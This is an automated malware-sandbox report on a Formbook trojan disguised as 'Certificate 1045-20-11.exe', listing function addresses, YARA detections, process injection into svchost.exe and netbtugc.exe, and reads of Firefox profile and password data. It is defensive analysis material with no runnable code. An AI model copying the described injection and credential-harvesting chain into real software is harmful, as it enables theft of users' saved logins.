            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031314601_2_03131460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EE4F61_2_031EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FAB401_2_031FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFB761_2_031FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315FB801_2_0315FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F6BD71_2_031F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B5BF01_2_031B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317DBF91_2_0317DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFA491_2_031FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F7A461_2_031F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B3A6C1_2_031B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA801_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DDAAC1_2_031DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03185AA01_2_03185AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EDAC61_2_031EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031499501_2_03149950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B9501_2_0315B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031569621_2_03156962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320A9A61_2_0320A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A01_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AD8001_2_031AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031428401_2_03142840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314A8401_2_0314A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031268B81_2_031268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E8F01_2_0316E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031438E01_2_031438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFF091_2_031FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160F301_2_03160F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03182F281_2_03182F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4F401_2_031B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141F921_2_03141F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFFB11_2_031FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BEFA01_2_031BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132FC81_2_03132FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FEE261_2_031FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140E591_2_03140E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152E901_2_03152E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FCE931_2_031FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03149EB01_2_03149EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FEEDB1_2_031FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314AD001_2_0314AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F1D5A1_2_031F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03143D401_2_03143D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F7D731_2_031F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03158DBF1_2_03158DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315FDC01_2_0315FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313ADE01_2_0313ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140C001_2_03140C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B9C321_2_031B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0CB51_2_031E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130CF21_2_03130CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFCF21_2_031FFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033DA3523_2_033DA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0332E3F03_2_0332E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033E03E63_2_033E03E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033C02743_2_033C0274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033A02C03_2_033A02C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033BA1183_2_033BA118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033101003_2_03310100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033A81583_2_033A8158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033E01AA3_2_033E01AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033D41A23_2_033D41A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033D81CC3_2_033D81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033B20003_2_033B2000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033207703_2_03320770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033447503_2_03344750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0331C7C03_2_0331C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0333C6E03_2_0333C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033205353_2_03320535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033E05913_2_033E0591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033C44203_2_033C4420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033D24463_2_033D2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033CE4F63_2_033CE4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033DAB403_2_033DAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033D6BD73_2_033D6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0331EA803_2_0331EA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033369623_2_03336962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033229A03_2_033229A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033EA9A63_2_033EA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033228403_2_03322840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0332A8403_2_0332A840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033068B83_2_033068B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0334E8F03_2_0334E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03340F303_2_03340F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033C2F303_2_033C2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03362F283_2_03362F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03394F403_2_03394F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0339EFA03_2_0339EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03312FC83_2_03312FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033DEE263_2_033DEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03320E593_2_03320E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03332E903_2_03332E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033DCE933_2_033DCE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033DEEDB3_2_033DEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033BCD1F3_2_033BCD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0332AD003_2_0332AD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03338DBF3_2_03338DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0331ADE03_2_0331ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03320C003_2_03320C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033C0CB53_2_033C0CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03310CF23_2_03310CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033D132D3_2_033D132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0330D34C3_2_0330D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0336739A3_2_0336739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033252A03_2_033252A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0333D2F03_2_0333D2F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033C12ED3_2_033C12ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0333B2C03_2_0333B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0330F1723_2_0330F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033EB16B3_2_033EB16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0335516C3_2_0335516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0332B1B03_2_0332B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033D70E93_2_033D70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033DF0E03_2_033DF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033CF0CC3_2_033CF0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033270C03_2_033270C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033DF7B03_2_033DF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033656303_2_03365630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033D16CC3_2_033D16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033D75713_2_033D7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033BD5B03_2_033BD5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033E95C33_2_033E95C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033DF43F3_2_033DF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033114603_2_03311460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033DFB763_2_033DFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0333FB803_2_0333FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03395BF03_2_03395BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0335DBF93_2_0335DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03393A6C3_2_03393A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033DFA493_2_033DFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033D7A463_2_033D7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03365AA03_2_03365AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033BDAAC3_2_033BDAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033C1AA33_2_033C1AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033CDAC63_2_033CDAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033B59103_2_033B5910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033299503_2_03329950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0333B9503_2_0333B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0338D8003_2_0338D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033238E03_2_033238E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033DFF093_2_033DFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033DFFB13_2_033DFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03321F923_2_03321F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_032E3FD53_2_032E3FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_032E3FD23_2_032E3FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03329EB03_2_03329EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033D7D733_2_033D7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033D1D5A3_2_033D1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03323D403_2_03323D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0333FDC03_2_0333FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03399C323_2_03399C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033DFCF23_2_033DFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_007615E03_2_007615E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0075C7D03_2_0075C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0075C7C73_2_0075C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0075C9F03_2_0075C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0075AA703_2_0075AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_007630F03_2_007630F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_007630EE3_2_007630EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00779FD03_2_00779FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02FDA0AF3_2_02FDA0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02FDB8B43_2_02FDB8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02FDB9D63_2_02FDB9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02FDADD83_2_02FDADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02FDBD6C3_2_02FDBD6C
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: String function: 0085EC2F appears 68 times
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: String function: 0086F8A0 appears 35 times
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: String function: 00866AC0 appears 42 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03187E54 appears 93 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0312B970 appears 250 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03175130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 031AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0330B970 appears 262 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0338EA12 appears 85 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03355130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03367E54 appears 107 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0339F290 appears 103 times
            Source: Certificate 1045-20-11.exe, 00000000.00000003.1714213013.0000000003553000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Certificate 1045-20-11.exe
            Source: Certificate 1045-20-11.exe, 00000000.00000003.1714425888.00000000036FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Certificate 1045-20-11.exe
            Source: Certificate 1045-20-11.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@16/7
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0088CE7A GetLastError,FormatMessageW,0_2_0088CE7A
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0087AB84 AdjustTokenPrivileges,CloseHandle,0_2_0087AB84
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0087B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0087B134
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0088E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0088E1FD
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00886532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00886532
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0089C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0089C18C
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0084406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0084406B
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeFile created: C:\Users\user\AppData\Local\Temp\aut5DA7.tmpJump to behavior
            Source: Certificate 1045-20-11.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000003.00000002.4165640004.0000000002EC1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.2055763353.0000000002EC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Certificate 1045-20-11.exeReversingLabs: Detection: 28%
            Source: unknownProcess created: C:\Users\user\Desktop\Certificate 1045-20-11.exe "C:\Users\user\Desktop\Certificate 1045-20-11.exe"
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 1045-20-11.exe"
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 1045-20-11.exe"Jump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
